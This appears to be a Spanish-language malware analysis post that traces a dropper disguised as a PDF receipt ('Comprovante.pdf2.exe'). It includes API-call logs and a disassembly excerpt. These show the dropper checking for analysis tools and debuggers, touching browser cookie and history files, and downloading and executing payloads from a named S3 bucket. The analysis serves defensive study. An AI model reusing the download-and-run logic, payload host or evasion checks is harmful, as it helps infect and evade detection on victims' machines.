LoadLibrary(gdi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(oleaut32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(ole32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(urlmon.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(iertutil.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(user32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(version.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(lz32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(lz32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(kernel32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
VirtualQueryEx(c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(Kernel32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcessToken(C:\Documents and Settings\r32\Mis documentos\Descargas\Comprovante\Comprovante.pdf2.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(oleaut32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(USER32.DLL) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
IsDebuggerPresent() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
BitBlt() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(version.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(ShimCacheMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\Documents and Settings\r32\Mis documentos\Descargas\Comprovante\Comprovante.pdf2.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(USER32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(comctl32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETWORKAREA,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SetTimer(b01a0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SetTimer(13020c) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SetTimer(1001c4) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(explorer.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(ctfmon.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(sniff_hit.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(wireshark.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(SbieCtrl.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(VBoxTray.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(procexp.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(Pm.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetForegroundWindow() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\Msimtf.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SetTimer(1401a8) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/jjca.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\!IETld!Mutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rpcrt4.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetComputerName() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\!IETld!Mutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\URLMON.DLL) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(wininet.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
ResumeThread() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(normaliz.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(Advapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
InternetSetOption() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetUserName() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(secur32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(shell32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(LPK.DLL) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\_!MSFTHISTORY!_) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\_!MSFTHISTORY!_) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateFile(C:\Documents and Settings\r32\Configuración local\Archivos temporales de Internet\Content.IE5\index.dat) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\c:!documents and settings!r32!cookies!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\c:!documents and settings!r32!cookies!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateFile(C:\Documents and Settings\r32\Cookies\index.dat) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\c:!documents and settings!r32!configuración local!historial!history.ie5!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\c:!documents and settings!r32!configuración local!historial!history.ie5!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateFile(C:\Documents and Settings\r32\Configuración local\Historial\History.IE5\index.dat) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\WininetStartupMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(ws2_32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(ws2_32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(ws2help.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(shlwapi.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\WininetConnectionMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\WininetProxyRegistryMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
InternetGetConnectedState() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rasapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateEvent(DINPUTWINMM) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rasman.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(netapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(tapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rtutils.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(winmm.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(RasPbFile) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(RasPbFile) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
RasEnumEntries() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\RASAPI32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenSCManager((null),(null)) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenService(RASMAN) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(userenv.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
lstrcmpi(WinNT,WinNT) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateEvent(Global\userenv:  User Profile setup event) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msapsspc.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
lstrcmpi(COMPUTERNAME,TEMP) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
lstrcmpi(COMPUTERNAME,TMP) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msvcrt40.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\msapsspc.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(schannel.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(crypt32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msasn1.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\ADVAPI32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateEvent(Global\crypt32LogoffEvent) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\schannel.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\kernel32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(digest.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\digest.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msnsspc.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\msnsspc.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\msv1_0.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(cryptdll.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(iphlpapi.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\WININET.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenService(Sens) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(sensapi.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
InternetOpen() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
InternetConnect(s3-sa-east-1.amazonaws.com) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\mswsock.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/jjca.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(hnetcfg.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\wshtcpip.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\USERENV.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(ws2_32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
bind(port=0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
connect( 127.0.0.1:2673 ) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(wintrust.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(imagehlp.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\wintrust.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(schannel) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(crypt32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\ZonesCounterMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\ZoneAttributeCacheCounterMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\ZonesCacheCounterMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\ZonesLockedCacheCounterMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(ole32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpSendRequest() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rasadhlp.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
connect( 127.0.0.1:9666 ) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/Projeto.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/Projeto.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateProcess((null),C:\wina\Projeto.exe,(null)) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/jsobs.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/jsobs.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/jsob.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/jsob.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/trusted.certs) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/trusted.certs) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
ExitProcess(0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\rasman.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\rtutils.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(EXPLORER.EXE) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\Msctf.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(BSA.EXE) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(dumpcap.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(RegWatcher.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(arwwdwin.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(XueTr.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(notepad.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\Documents and Settings\r32\Mis documentos\Descargas\Comprovante\Comprovante.pdf2.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\msv1_0.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\IMM32.DLL) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]

En la raiz del disco crea una carpeta oculta y de sistema "wina" donde se alojarán los archivos descargados:

Código:
CODE:0045404B                 push    0
CODE:0045404D                 push    0
CODE:0045404F                 push    offset aCWinaJjca_dll ; "C:\\wina\\jjca.dll"
CODE:00454054                 push    offset aHttpsS3SaEast1 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:00454059                 push    0
CODE:0045405B                 call    URLDownloadToFileA
CODE:00454060                 push    0
CODE:00454062                 push    0
CODE:00454064                 push    offset aCWinaProjeto_e ; "C:\\wina\\Projeto.exe"
CODE:00454069                 push    offset aHttpsS3SaEas_0 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:0045406E                 push    0
CODE:00454070                 call    URLDownloadToFileA
CODE:00454075                 push    5
CODE:00454077                 push    offset aCWinaProjeto_e ; "C:\\wina\\Projeto.exe"
CODE:0045407C                 call    WinExec
CODE:00454081                 push    0
CODE:00454083                 push    0
CODE:00454085                 push    offset aCWinaJsobs_exe ; "C:\\wina\\jsobs.exe"
CODE:0045408A                 push    offset aHttpsS3SaEas_1 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:0045408F                 push    0
CODE:00454091                 call    URLDownloadToFileA
CODE:00454096                 push    0
CODE:00454098                 push    0
CODE:0045409A                 push    offset aCWinaJsob_exe ; "C:\\wina\\jsob.exe"
CODE:0045409F                 push    offset aHttpsS3SaEas_2 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:004540A4                 push    0
CODE:004540A6                 call    URLDownloadToFileA
CODE:004540AB                 push    5
CODE:004540AD                 push    offset aCWinaJsob_exe ; "C:\\wina\\jsob.exe"
CODE:004540B2                 call    WinExec
CODE:004540B7                 push    0
CODE:004540B9                 push    0
CODE:004540BB                 lea     edx, [ebp-4]
CODE:004540BE                 mov     eax, offset _str_LOCALAPPDATA.Text
CODE:004540C3                 call    @Sysutils@GetEnvironmentVariable$qqrx17System@AnsiString ; Sysutils::GetEnvironmentVariable(System::AnsiString)
CODE:004540C8                 lea     eax, [ebp-4]
CODE:004540CB                 mov     edx, offset _str_Low_Sun_Java_De.Text
CODE:004540D0                 call    @System@@LStrCat$qqrv ; System::__linkproc__ LStrCat(void)
CODE:004540D5                 mov     eax, [ebp-4]
CODE:004540D8                 call    @System@@LStrToPChar$qqrx17System@AnsiString ; System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:004540DD                 push    eax
CODE:004540DE                 push    offset aHttpsS3SaEas_3 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:004540E3                 push    0
CODE:004540E5                 call    URLDownloadToFileA
CODE:004540EA                 mov     eax, ds:off_456734
CODE:004540EF                 mov     eax, [eax]
CODE:004540F1                 call    @Forms@TApplication@Terminate$qqrv ; Forms::TApplication::Terminate(void)
CODE:004540F6                 xor     eax, eax
CODE:004540F8                 pop     edx
CODE:004540F9                 pop     ecx
CODE:004540FA                 pop     ecx
CODE:004540FB                 mov     fs:[eax], edx
CODE:004540FE                 jmp     short loc_45410A

Descarga de archivos y del certificado:





Archivos creados y conexión con URL:



Petición de archivo "sistema.html" no encontrado en el server:



Análisis del archivo "jsob.exe":
Código:
Code:
Executing: c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe
LoadLibrary(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(msvcrt.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(ole32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(advapi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(user32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(msimg32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(gdi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(shlwapi.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(winspool.drv) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
VirtualQueryEx(c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(Kernel32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcessToken(C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\jsob.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(USER32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
